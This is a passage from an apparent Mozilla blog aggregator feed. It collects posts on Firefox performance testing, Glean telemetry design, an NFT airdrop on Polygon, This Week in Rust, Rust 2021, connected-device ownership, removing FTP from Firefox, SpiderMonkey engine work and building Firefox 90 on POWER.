  • Valid regressions were associated with bugs in an average of 1.3 days
  • 100% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (June 2021)

As mentioned in last month’s newsletter, automated backfills were enabled in April and we had already seen some early signs that this had a positive impact on the time it takes for our sheriffs to raise regression bugs. I’m encouraged to see that this trend has continued into June’s results, and both May and June had 100% of regression bugs raised within 5 days. It is worth noting that the total number of alerts also dropped in June, so it may still be too early to draw any conclusions.

Highlights from H1/2021

Now that we’re over halfway through the year, it’s a perfect time to reflect on the highlights in performance testing so far in 2021.

Visual page load on Desktop

In 2019 we started to add support in our performance tests for using the popular performance tool Browsertime, with a view to eventually replace our internally developed web extension. Back in February we completed the migration for all of the performance tests that we actively sheriff (we have a handful of tests still using the web extension).

Integrating Browsertime provides us with valuable visual metrics (much closer to user perceived performance than the navigation timing metrics). It also gives us improved browser support by using WebDriver instead of a web extension (web extensions are not supported on Chrome for Android). You can read more about this work in last month’s newsletter.

Automated backfills

In April we enabled automatic backfills for alerts for Linux and Windows. This means that whenever we generate an alert summary for these platforms, we now automatically trigger the affected tests against additional pushes. This is typically the first thing a sheriff will do when triaging an alert, and whilst it isn’t a time consuming task, the triggered jobs can take a while to run. By automating this, we increase the chance of our sheriffs having the additional context needed to identify the push that caused the alert at the time of triage.

If successful, automatic backfills should reduce the time between the alert being generated and the regression bug being opened. If you’re interested in following the progress, the sheriffing efficiency is shared each month in this newsletter.

Record/replay sites in mozperftest

In the last few weeks, the team has integrated mozperftest with mozproxy. To better understand this integration, and why it was necessary we first need to provide context for each of these tools.

  • The mozperftest project was created with the intention to replace all existing performance testing frameworks that exist in the mozilla-central source tree with a single one, and make performance tests a standardised, 1st class citizen, alongside mochitests and xpcshell tests.
  • The mozproxy tool allows you to launch an HTTP proxy to either record all the requests/responses when visiting a website, or to use one of these recordings to simulate visiting a website. This is currently used in Raptor to run our page load tests, eliminating network latency, and preventing deployments of service disruptions to these sites from affecting our results.

As mozperftest is already able to run tests using browsertime (like our Raptor harness), the last step remaining to introduce the ability to run our page load tests in mozperftest was integrating the proxy service. This work also simplifies the process of generating recordings, and will allow us to move closer to automating many of these.

PerfDocs improvements

Back in November, Greg Mierzwinski posted about Dynamic Test Documentation with PerfDocs. Since then, development has continued, and I’d like to highlight a few recent improvements. The first is that we now display a more compact view for tests, with details by default concealed from view. We also provide convenient links for when you need to direct anyone to the documentation for a specific test, in which case we also automatically expand to show the full details. These links are also now used in various places where test data is shown, such as bugzilla, Perfherder, and https://arewefastyet.com/.

PerfDocs expanded entry

PerfDocs example with test details expanded

In addition to this, we have integrated PerfDocs generation with our TaskCluster scheduling. This means that we’re able to quickly answer the question of which platforms and branches tests are running. An awesome side-effect of this integration is that any change to the scheduling of performance tests will cause the PerfDocs to be updated, and the performance test team will be automatically flagged as reviewers for the patch. This will significantly reduce the risk of unintentionally running (or not running) performance tests on certain platforms. Check out the PerfDocs for the Facebook desktop page load test for an example of this by looking for the Test Task section.

You can visit PerfDocs for our other harnesses by visiting the Performance Testing page. At this time Talos and AWSY are static pages, and were recently migrated from the Mozilla Wiki. Raptor and mozperftest are dynamically generated from the test definitions.

I’d like to highlight that most of the work on PerfDocs has been thanks to Myeongjun Go [:myeongjun], our fantastic volunteer contributor!

Perfherder improvements

There have been a lot of improvements to Perfherder, which is used to visualise performance data and manage alerts when regressions are detected. See What’s new in Perfherder? for details of the latest updates, including many from this year.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for June can be found here (for those with access).

Data@MozillaThis Week in Glean: Firefox Telemetry is to Glean as C++ is to Rust

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

I had this goofy idea that, like Rust, the Glean SDKs (and Ecosystem) aim to bring safety and higher-level thought to their domain. This is in comparison to how, like C++, Firefox Telemetry is built out of flexible primitives that assume you very much know what you’re doing and cannot (will not?) provide any clues in its design as to how to do things properly.

I have these goofy thoughts a lot. I’m a goofy guy. But the more I thought about it, the more the comparison seemed apt.

In Glean wherever we can we intentionally forbid behaviour we cannot guarantee is safe (e.g. we forbid non-commutative operations in FOG IPC, we forbid decrementing counters). And in situations where we need to permit perhaps-unsafe data practices, we do it in tightly-scoped areas that are identified as unsafe (e.g. if a timing_distribution uses accumulate_raw_samples_nanos you know to look at its data with more skepticism).

In Glean we encourage instrumentors to think at a higher level (e.g. memory_distribution instead of a Histogram of unknown buckets and samples) thereby permitting Glean to identify errors early (e.g. you can’t start a timespan twice) and allowing Glean to do clever things about it (e.g. in our tooling we know counter metrics are interesting when summed, but quantity metrics are not). Speaking of those errors, we are able to forbid error-prone behaviour through design and use of language features (e.g. In languages with type systems we can prevent you from collecting the wrong type of data) and when the error is only detectable at runtime we can report it with a high degree of specificity to make it easier to diagnose.

There are more analogues, but the metaphor gets strained. (( I mean, I guess a timing_distribution’s `TimerId` is kinda the closest thing to a borrow checker we have? Maybe? )) So I should probably stop here.

Now, those of you paying attention might have already seen this relationship. After all, as we all know, glean-core (which underpins most of the Glean SDKs regardless of language) is actually written in Rust whereas Firefox Telemetry’s core of Histograms, Scalars, and Events is written in C++. Maybe we shouldn’t be too surprised when the language the system is written in happens to be reflected in the top-level design.

But! glean-core was (for a long time) written in Kotlin from stem to stern. So maybe it’s not due to language determinism and is more to do with thoughtful design, careful change processes, and a list of principles we hold to firmly as the number of supported languages and metric types continues to grow.

I certainly don’t know. I’m just goofing around.

:chutten

(( This is a syndicated copy of the original blog post. ))

Chris H-CThis Week in Glean: Firefox Telemetry is to Glean as C++ is to Rust

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

I had this goofy idea that, like Rust, the Glean SDKs (and Ecosystem) aim to bring safety and higher-level thought to their domain. This is in comparison to how, like C++, Firefox Telemetry is built out of flexible primitives that assume you very much know what you’re doing and cannot (will not?) provide any clues in its design as to how to do things properly.

I have these goofy thoughts a lot. I’m a goofy guy. But the more I thought about it, the more the comparison seemed apt.

In Glean wherever we can we intentionally forbid behaviour we cannot guarantee is safe (e.g. we forbid non-commutative operations in FOG IPC, we forbid decrementing counters). And in situations where we need to permit perhaps-unsafe data practices, we do it in tightly-scoped areas that are identified as unsafe (e.g. if a timing_distribution uses accumulate_raw_samples_nanos you know to look at its data with more skepticism).

In Glean we encourage instrumentors to think at a higher level (e.g. memory_distribution instead of a Histogram of unknown buckets and samples) thereby permitting Glean to identify errors early (e.g. you can’t start a timespan twice) and allowing Glean to do clever things about it (e.g. in our tooling we know counter metrics are interesting when summed, but quantity metrics are not). Speaking of those errors, we are able to forbid error-prone behaviour through design and use of language features (e.g. In languages with type systems we can prevent you from collecting the wrong type of data) and when the error is only detectable at runtime we can report it with a high degree of specificity to make it easier to diagnose.

There are more analogues, but the metaphor gets strained. (( I mean, I guess a timing_distribution’s `TimerId` is kinda the closest thing to a borrow checker we have? Maybe? )) So I should probably stop here.

Now, those of you paying attention might have already seen this relationship. After all, as we all know, glean-core (which underpins most of the Glean SDKs regardless of language) is actually written in Rust whereas Firefox Telemetry’s core of Histograms, Scalars, and Events is written in C++. Maybe we shouldn’t be too surprised when the language the system is written in happens to be reflected in the top-level design.

But! glean-core was (for a long time) written in Kotlin from stem to stern. So maybe it’s not due to language determinism and is more to do with thoughtful design, careful change processes, and a list of principles we hold to firmly as the number of supported languages and metric types continues to grow.

I certainly don’t know. I’m just goofing around.

:chutten

Mark MayoHow we airdropped 4700 MeebitsDAO “Red Ticket” NFTs

[I’m Mark from block::block; we help build DAO backends and various NFT bits and bobs]

So what happened was that the 6th most rare Meebit was fractionalized into 1M pieces, and 30,000 (3%) of those fragments were graciously donated to MeebitsDAO by Divergence.VC. Kai proposed that a fun way to re-distribute those fractions would be to do a giveaway contest. Earn tickets for a raffle, have a shot at a chunk of a famous Meebit. Cool! There’s 3 different kinds of tickets, but for the 1st lottery Kai wanted to airdrop a raffle ticket in the form of an NFT — aka the “Red Ticket” — to every current Meebit holder so they could have a chance to win. Hype up the MeebitsDAO and have some fun!

The first question was “cool idea, but how do we not lose our shirts on gas fees minting 4700 NFTs!?”. There’s a bunch of low-gas alternative chains out there now, which, fortunately, we’d played around with quite a bit when we started doing community “Achievement” NFTs (see some here on OpenSea) for MeebitsDAO. Polygon, for the moment at least, had some really compelling advantages for this kind of “badge” NFT where there’s no/limited monetary value in the token:

  • Polygon is 100% ethereum compatible — same solidity smart contracts, same metamask, even the same explorer (the etherscan team built polygonscan). Easy!
  • For end users Polygon addresses are the same as their Ethereum addresses. 1:1. Nice!
  • OpenSea natively/automatically displays NFTs from a user’s matching polygon address in their collection! This was huge, because we knew 99% of wallets we wanted to drop a ticket on wouldn’t otherwise notice activity on a side-chain.
  • Polygon assets can be moved back to Ethereum mainnet by folks if they so desire, which has a nice feeling.

Getting up and running on Polygon is covered elsewhere, and is pretty simple:

  • Add a “custom RPC” network to metamask.
  • Get some fake test MATIC (the native token on the polygon chain) on the “Mumbai” testnet from a faucet and play around.
  • Get some “real” MATIC on mainnet. Fees are super low on Polygon, so you don’t need much for minting, 5 MATIC ($5!) is plenty to mint thousands of NFTs. I swapped Eth for MATIC on 1inch, and then bridged that MATIC to Polygon. There are many other ways of doing it.

For MeebitsDAO, we create our own ERC721 smart contracts and mint from them instead of using a minting service. It gives us more control, and over time we’re building up a repo of code and scripts that gets better and better and is purpose-built to the needs of the MeebitsDAO community. This maybe sounds like a lot of work vs using a site like Cargo, but if you have some Node.js experience tools like Hardhat make deploying contracts and minting from them approachable.

If you’re new to Ethereum and NFTs, the first thing you need to do know is that you 1st deploy your smart contract to the blockchain, at which point it will get an address, and then you call that smart contract on that address to mint NFT tokens. As you mint the tokens you need to supply a URI that contains the metadata for that particular token (almost everything we think of as “the NFT” — the description, image, etc. — actually lives in the metadata file off-chain). We generate a JSON file for each ticket and upload it to IPFS via a Pinata gateway, and then pin the file with the Pinata SDK. (pinning is the mechanism where you entice IPFS nodes to not discard your files.. ah, IPFS..)

Like many projects, we lean on the heavily tested de facto ERC721 contracts published by the OpenZeppelin team:

https://medium.com/media/8151e4e4313636843195e0442a8246f3/href

The contract maybe looks a little daunting but really all it says is:

  • Be an ERC721 that has metadata in an external URI, and be burnable by an approved address on an access list.
  • The Counters stuff lets the token be capped — i.e. a fixed supply, supplied at contract creation.
  • safeMint/burn/tokenURI/supportedInterface are just boilerplate to allow above.
  • totalSupply() lets block explorers like etherscan/polygonscan/etc. know what the cap on the token is so they can display it in their UIs.

Once the contract is published, we have a helper script in the hardhat repo that simply reads a CSV files of addresses we want to airdop the ticket to and calls safeMint() on the contract. Here’s the core loop:

https://medium.com/media/43a212e771f50e7a23f29033ee8125c7/href

Because blockchain calls don’t always finish quickly, or at all, we use a try{} block to wait for the transactions to succeed before moving onto the next ticket, logging success/failure. When we minted the 4689 NFTs it just happened to be on a morning when Polygon was quite busy, so it took a few hours to complete. We had logs of 2 mints that failed, so we just re-ran those to complete the drop.

You can check out the full repo on GitHub, but hopefully this gives you a quick view at the two “bespoke” pieces: the contract and the minting logic.

Our goal is to share as much as we can about what goes on behind the scenes at block::block as we help the MeebitsDAO team launch fun ideas! Let us know if it’s helpful, what’s missing, what’s cool, and what else we could write about that help shine a light on “DAO Ops”. :)


How we airdropped 4700 MeebitsDAO “Red Ticket” NFTs was originally published in Block::Block on Medium, where people are continuing the conversation by highlighting and responding to this story.

Support.Mozilla.OrgIntroducing Joseph Cuevas

Hey folks,

Please join me to welcome Joseph Cuevas (Joe) as part of the Customer Experience team and the broader SUMO family. Joe is going to be working as an Operations Manager specifically to build a premium customer experience for current and future Mozilla’s paid products.

Here’s a brief introduction from Joe:

Hi everyone! My name is Joe and I am the new User Support Operations Manager joining the Customer Experience Team. I’ll be working with my team to build a premium customer support experience for Mozilla VPN. I’m looking forward to working alongside and getting to know my fellow Mozillians. I just know we’re going to have a great time!

Welcome, Joe!

This Week In RustThis Week in Rust 400

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Issue 400!

We are so happy to have reached issue 400 of This Week in Rust! To mark this occasion, we would like to introduce you to your editors who put these issues together for you every week!

Current Editors

Nell Shamrell-Harrington

Hello everyone! I'm Nell Shamrell-Harrington (nellshamrell on GitHub). I've served as lead editor of This Week in Rust for a little over a year now. Currently, I work as a Principal Engineer at Microsoft, prior to that I was on the Rust team at Mozilla. I also am a member of the Rust Foundation Board of Directors. My greatest joy in editing This Week in Rust is seeing how dedicated Rustaceans are to teaching and passing on what they have learned. We are a community where personal maturity and empathy are as important as technical excellence. When I'm not working, I'm often caring for and playing with my three pet bunnies - Lucy, Leia, and Noah!

Andre Bogus

Greetings, Rustaceans! I'm Andre 'llogiq' Bogus, and I've been editing TWiR since 2016. I currently work with synth, my third Job using Rust. I am one of the first clippy maintainers, a mod team member, a Rust bard and I have several crates to my name. I'm always amused with the quotes you folks suggest, and like being on top of the merged PRs, so I know what's coming in the next Rust versions. Besides Rust, I like making music, biking, skateboarding and spending time with my wife, three kids and cat.

Colton Donnelly

Good morning to all of you fellow Rustaceans! I'm Colton Donnelly (usually under the screen name cdmistman), and I've been editing TWiR since May 2020. I'm currently a co-op working on the Alan programming language, which uses Rust in the runtime - this is the second time I've had an internship using Rust! I've really enjoyed reading all of your Rust blog posts and articles over the past year (and practicing my speed-reading while I'm at it), it's been awesome seeing how much knowledge y'all like to share. When I'm not coding, I'm usually playing games with friends or binge-watching shows.

Past Editors

Thank you so much to all who have edited This Week in Rust over the years!

Thank YOU

And a special thank you to all who have contributed to This Week in Rust and every single one of our subscribers and readers! Here is to many more issues!

Updates from Rust Community

No newsletters or papers this week.

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is dylint, a tool for running Rust lints from dynamic libraries.

Thanks to George Hahn for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

280 pull requests were merged in the last week

Rust Compiler Performance Triage

A mixed week, with some moderate regressions and moderate improvements. There were some notable PR's that were specifically oriented around performance enhancements.

Triage done by @pnkfelix. Revision range: 5aff6dd07a562a2cba3c57fc3460a72acb6bef46..5c0ca08c662399c1c864310d1a20867d3ab68027

3 Regressions, 3 Improvements, 3 Mixed; 1 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

The Tor Project

Snapview

Luminovo

Clear

ChainSafe

PolarFox Network

CNRS

The Mobility House GmbH

Immunant

Wingback

Anixe

Modeldrive

NZXT

Kollider

Tempus Ex

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Tip: whenever you wonder if Pin could be the solution, it isn't

@SkiFire13 on the official Rust Discord

Thanks to Kestrer for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Rust Programming Language BlogRust 2021 public testing period

Rust 2021 public testing period

We are happy to announce that the Rust 2021 edition is entering its public testing period. All of the planned features for the edition are now available on nightly builds along with migrations that should move your code from Rust 2018 to Rust 2021. If you'd like to learn more about the changes that are part of Rust 2021, check out the nightly version of the Edition Guide.

Public testing period

As we enter the public testing period, we are encouraging adventurous users to test migrating their crates over to Rust 2021. As always, we expect this to be a largely automated process. The steps to try out the Rust 2021 Edition as follows (more detailed directions can be found here):

  1. Install the most recent nightly: rustup update nightly.
  2. Run cargo +nightly fix --edition.
  3. Edit Cargo.toml and place cargo-features = ["edition2021"] at the top (above [package]), and change the edition field to say edition = "2021".
  4. Run cargo +nightly check to verify it now works in the new edition.

Note that Rust 2021 is still unstable, so you can expect bugs and other changes! We recommend migrating your crates in a temporary copy of your code versus your main branch. If you do encounter problems, or find areas where quality could be improved (missing documentation, confusing error messages, etc) please file an issue and tell us about it! Thank you!

What comes next

We are targeting stabilization of all Rust 2021 for Rust 1.56, which will be released on October 21st, 2021. Per the Rust train release model, that means all features and work must be landed on nightly by September 7th.

The Mozilla BlogDo you own a connected device? Here’s why you should be wary of the Peloton lock issue.

A growing number of us have connected devices in our homes, offices, driveways and even our bodies. The convenience and fun of integrating a device with daily life is real, but there haven’t been nearly enough conversations about who owns that data and how much consumers are letting big companies into their lives in unexpected ways. A current example: Peloton. 

By now, nearly everyone has heard of Peloton exercise bikes, from the viral ad when they first launched to questions about the security on President Biden’s bike. Peloton’s popularity is largely tied to its design as a connected device with an extensive online community. Peloton also makes treadmills. Tragically, a 6-year old was recently killed in an accident on one of these treadmills. Due to safety concerns, Peloton issued a recall and added a feature called Tread Lock that requires a four-digit passcode to keep their treadmills from starting up for anyone without authorized access.

Sounds great, right? Here’s the problem. Peloton treadmill users now need that Tread Lock four-digit passcode to unlock their treadmill, and Tread Lock requires a $39 per month Peloton membership. If users cannot unlock their treadmill, they can’t use the machine at all. Peloton is offering the Tread Lock subscription at no cost for three months and says they are working on restoring access to the treadmill without a subscription. However, Peloton has provided no timeframe for restoring the no-subscription access.
Many Peloton users are worried their costly treadmills will turn into expensive towel racks — not something they signed up for when they bought the treadmill.

Use the Privacy Not Included Guide to shop smart for connected devices

Go to the guide

Why this matters to you

Even if you don’t own a Peloton, the issue of who owns and controls a connected device after purchase could be coming your way in the near future. As the number of connected devices in homes and offices continues to grow globally, consumers should be on the lookout for increasing conflicts with makers of connected devices. 

Another recent example came up during a heat wave in the U.S. earlier this summer when power companies in Texas remotely turned up connected thermostats of customers trying to keep their homes cool. Seems these customers had signed up for an energy saver program they didn’t realize gave the power companies the ability to control their smart thermostat until their homes got unexpectedly warm when they were trying to stay cool.

Corporations having a certain level of control over the devices you own in your own home without your explicit awareness because it was buried in the fine print that often goes unread, or companies making you pay extra to use a device you’ve already paid a lot of money for, is potentially pretty creepy. And it’s something we plan to keep an eye on for you in the future.

The post Do you own a connected device? Here’s why you should be wary of the Peloton lock issue. appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgSpring Cleaning MDN: Part 1

As we’re all aware by now, we made some big platform changes at the end of 2020. Whilst the big move has happened, its given us a great opportunity to clear out the cupboards and closets.

An illustration of a salmon coloured dinosaur sweeping with a broom

                                  Illustration by Daryl Alexsy

 

Most notably MDN now manages its content from a repository on GitHub. Prior to this, the content was stored in a database and edited by logging in to the site and modifying content via an in-page (WYSIWYG) editor, aka ‘The Wiki’. Since the big move, we have determined that MDN accounts are no longer functional for our users. If you want to edit or contribute content, you need to sign in to GitHub, not MDN.

Due to this, we’ll be removing the account functionality and removing all of the account data from our database. This is consistent with our Lean Data Practices principles and our commitment to user privacy. We also have the perfect opportunity to be doing this now, as we’re moving our database from MySQL to PostgreSQL this week.

Accounts will be disabled on MDN on Thursday, 22nd July.

Don’t worry though – you can still contribute to MDN! That hasn’t changed. All the information on how to help is here in this guide.

The post Spring Cleaning MDN: Part 1 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Security BlogStopping FTP support in Firefox 90

 

The File Transfer Protocol (FTP) has long been a convenient file exchange mechanism between computers on a network. While this standard protocol has been supported in all major browsers almost since its inception, it’s by now one of the oldest protocols still in use and suffers from a number of serious security issues.

The biggest security risk is that FTP transfers data in cleartext, allowing attackers to steal, spoof and even modify the data transmitted. To date, many malware distribution campaigns launch their attacks by compromising FTP servers and downloading malware on an end user’s device using the FTP protocol.

 

Discontinuing FTP support in Firefox 90Aligning with our intent to deprecate non-secure HTTP and increase the percentage of secure connections, we, as well as other major web browsers, decided to discontinue support of the FTP protocol.

Removing FTP brings us closer to a fully-secure web which is on a path to becoming HTTPS only and any modern automated upgrading mechanisms such as HSTS or also Firefox’s HTTPS-Only Mode, which automatically upgrade any connection to become secure and encrypted do not apply to FTP.

The FTP protocol itself has been disabled by default since version 88 and now the time has come to end an era and discontinue the support for this outdated and insecure protocol — Firefox 90 will no longer support the FTP protocol.

If you are a Firefox user, you don’t have to do anything to benefit from this security advancement. As soon as your Firefox auto-updates to version 90, any attempt to launch an attack relying on the insecure FTP protocol will be rendered useless, because Firefox does not support FTP anymore. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the web.

 

The post Stopping FTP support in Firefox 90 appeared first on Mozilla Security Blog.

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 90-91)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 90 and 91 Nightly release cycles.

Firefox/SpiderMonkey 91 will become the next ESR branch and will remain supported over the next year.

👷🏽‍♀️ JS features

  • Support for Private Fields has been enabled by default (Firefox 90).
  • The Ergonomic Brand Checks for Private Fields proposal has been implemented (Firefox 90).
  • Support for the .at() proposal has been enabled by default (Firefox 90).
  • Intl.DateTimeFormat.dayPeriod is now available (Firefox 90).
  • The Error Cause proposal has been implemented (Firefox 91). This is also supported in our DevTools.
  • The Object.hasOwn proposal has been implemented (Firefox 91).
  • Intl.DisplayNames v2 has been implemented (Firefox 91).
  • Intl.DateTimeFormat support for formatRange and formatRangeToParts has been enabled by default (Firefox 91).

🌍 Unified Intl implementation

Work is underway to unify the Intl (Internationalization) code in SpiderMonkey and the rest of Gecko as a shared mozilla::intl component. This results in less code duplication and will make it easier to migrate from the ICU library to ICU4X in the future. The features and behaviour of this code continue to follow the ECMA-402 specification.

The past months number formatting, PluralRules and DateTimeFormat have been ported to the new mozilla::intl code module.

⚡ WebAssembly

  • We’ve revendored the SIMD test suite with a new translator.
  • More of the Baseline compiler has been templatized to clean up and simplify the code.
  • The Extended Constant Expressions proposal is now supported.
  • More SIMD operations have been optimized.
  • ARM64 codegen has been optimized more.
  • We fixed a performance cliff caused by the LICM optimization pass hoisting too much code out of very large loops.
  • We changed memory length values from bytes to pages to prepare for 64-bit Wasm memory.

🧪 WASI port

Fastly and Igalia have upstreamed an initial WASI port of SpiderMonkey. We’re very excited about bringing our JS engine to new platforms and exploring the future of this technology.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We’re now using shared memory to share stencils and bytecode for our self-hosted JS code (builtins implemented in JS) across content processes. This has resulted in significant memory usage and content process startup improvements.
  • To optimize and shrink self-hosted code more, we’ve started work on simplifying self-hosted bindings and certain intrinsics.
  • We’ve added testing functions for compiling to stencil off the main thread, to improve testing and fuzzing.
  • More code in the browser has been converted to the new stencil-based APIs.

📐 ReShape

ReShape is a project to optimize and simplify our object layout and property representation after removing TI. This will help us fix some long-standing issues related to performance, memory usage and code complexity.

  • We’ve converted ShapeTable (hash table for properties) from a custom hash table implementation to mozilla::HashSet. This has let us remove a lot of complicated code and is also faster.
  • After adding better abstractions for property lookups, we moved property information out of Shapes into a new PropMap (property map) data structure. This fixes some performance issues and has reduced JS memory by 5-6% because it allows sharing more information.

🚀 JIT

  • We’ve fixed the Baseline IC code for NewObject to be shareable. These unshared IC stubs used to account for more than 65% of all Baseline IC compilations on certain websites.
  • We’ve added Warp transpiler support for NewObject and NewArray IC stubs.
  • These changes made it possible to optimize JitScript allocation by allocating Baseline IC fallback stubs as fixed size array instead of using a bump allocator. We were also able to shrink and simplify various IC-related data structures.
  • We’ve added code generation based on YAML for MIR instructions, to remove C++ boilerplate code.
  • We removed the old arguments analysis code after switching to a much simpler design in Firefox 89.
  • We’ve optimized polymorphic Object.is more to improve React performance.
  • We added a mechanism to reorder type checks for polymorphic TypeOf and ToBool operations in Warp based on Baseline IC feedback.
  • Contributor Garima hardened the JIT back-ends by forcing the use of RAII patterns for scratch registers

🧹Garbage Collection

  • Documentation for the hazard analysis was moved from the wiki to firefox-source-docs.
  • We’ve changed the WeakMap marking algorithm to be much simpler and faster.
  • We’ve added GC counts to performance profiles to help diagnose performance issues.
  • We implemented a new pre-tenuring mechanism for object allocations. We used to have a TI-based implementation, but the new version is a lot more precise and robust.
  • The maximum store buffer size has been increased to avoid triggering nursery GCs too early on websites like Reddit.

📚 Miscellaneous

  • We redesigned our website at https://spidermonkey.dev/ and introduced our new logo.
  • SpiderMonkey can now use an external thread pool for background tasks. This was enabled in Firefox to reduce the number of background threads.
  • PropertyDescriptor (and code using it) has been greatly improved and simplified. It now uses proper encapsulation and enforces important invariants.
  • Storage for private methods has been optimized.
  • We’ve added debugger API support for private fields and methods.
  • We removed the old debugger instrumentation mechanism that was no longer being used.
  • The team did a small sprint to split up the big jsapi.h header file more.
  • We’ve simplified the complicated rope flattening code a lot.
  • We added a new Fuzzilli CI build to help our fuzzing team.
  • We’ve added more embedding APIs for working with BigInt values.
  • We’ve updated irregexp to the latest version.
  • mozilla::Unused is now unused in SpiderMonkey code.
  • Contributor sagu added CI support to the embedding examples repository.

The Talospace ProjectFirefox 90 on POWER (and a JIT progress report)

Firefox 90 is out, offering expanded and improved software WebRender (not really a problem if you've got a supported GPU as most of us in OpenPOWER land do, though), an enhanced SmartBlock which ups the arms race with Facebook, and private fields and methods in JavaScript among other platform updates. FTP is now officially and completely gone (and really should be part of registerProtocolHandler as Gopher is), but at least you can still use compact layout for tabs.

Unfortunately, a promising OpenPOWER-specific update for Fx90 bombed. Ordinarily I would have noticed this with my periodic smoke-test builds but I've been trying to continue work on the JavaScript JIT in my not-so-copious spare time (more on that in a moment), so I didn't notice this until I built Fx90 and no TLS connection would work (they all abort with SSL_ERROR_BAD_SERVER). I discussed this with Dan Horák and the official Fedora build of Firefox seemed to work just fine, including when I did a local fedpkg build. After a few test builds over the last several days I determined the difference was that the Fedora Firefox package is built with --use-system-nss to use the NSS included with Fedora, so it wasn't using whatever was included with Firefox.

Going to the NSS tree I found bug 1566124, an implementation of AES-GCM acceleration for Power ISA. (Interestingly, I tried to write an implementation of it last year for TenFourFox FPR22 but abandoned it since it would be riskier and not much faster with the more limited facilities on 32-bit PowerPC.) This was, to be blunt, poorly tested and Fedora's NSS maintainer indicated he would disable it in the shipping library. Thus, if you use Fedora's included NSS, it works, and if you use the included version in the Firefox tree (based on NSS 3.66), it won't. The fixes are in NSS 3.67, which is part of Firefox 91; they never landed on Fx90.

The two fixes are small (to security/nss/lib/freebl/ppc-gcm-wrap.c and security/nss/lib/freebl/ppc-gcm.s), so if you're building from source anyway the simplest and highest-performance option is just to include them. (And now that it's working, I do have to tip my hat to the author: the implementation is about 20 times faster.) Alternatively, Fedora 34 builders can still just add --with-system-nss to their .mozconfig as long as you have nspr-devel installed, or a third workaround is to set NSS_DISABLE_PPC_GHASH=1 before starting Firefox, which disables the faulty code at runtime. In Firefox 91 this whole issue should be fixed. I'm glad the patch is done and working, but it never should have been committed in its original state without passing the test suite.

Another issue we have a better workaround for is bug 1713968, which causes errors building JavaScript with gcc. The reason that Fedora wasn't having any problem doing so is its rather voluminous generated .mozconfig that, amongst other things, uses -fpermissive. This is a better workaround than minor hacks to the source, so that is now in the .mozconfigs I'm using. I also did a minor tweak to the PGO-LTO patch so that it applies cleanly. With that, here are my current configurations:

Debug

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24" # as you like
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-Og -mcpu=power9 -fpermissive"
ac_add_options --enable-debug
ac_add_options --enable-linker=bfd

export GN=/home/censored/bin/gn # if you have it

PGO-LTO Optimized

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24" # as you like
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-O3 -mcpu=power9 -fpermissive"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full
ac_add_options MOZ_PGO=1

export GN=/home/censored/bin/gn # if you have it
export RUSTC_OPT_LEVEL=2

So, JavaScript. Since our last progress report our current implementation of the Firefox JavaScript JIT (the minimum viable product of which will be Baseline Interpreter + Wasm) is now able to run scripts of significant complexity, but it's still mostly a one-man show and I'm currently struggling with an issue fixing certain optimized calls to self-hosted scripts (notably anything that calls RegExp.prototype.* functions: it goes into an infinite loop and hits the recursion limit). There hasn't been any activity the last week because I've preferred not to commit speculative work yet, plus the time I wasted tracking down the problem above with TLS. The MVP will be considered "V" when it can pass the JavaScript JIT and conformance test suites and it's probably a third of the way there. You can help. Ask in the comments if you're interested in contributing. We'll get this done sooner or later because it's something I'm motivated to finish, but it will go a lot faster if folks pitch in.

The Mozilla BlogOlivia Rodrigo, the cast of “The French Dispatch,” “Loki” and more are on this week’s Top Shelf

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

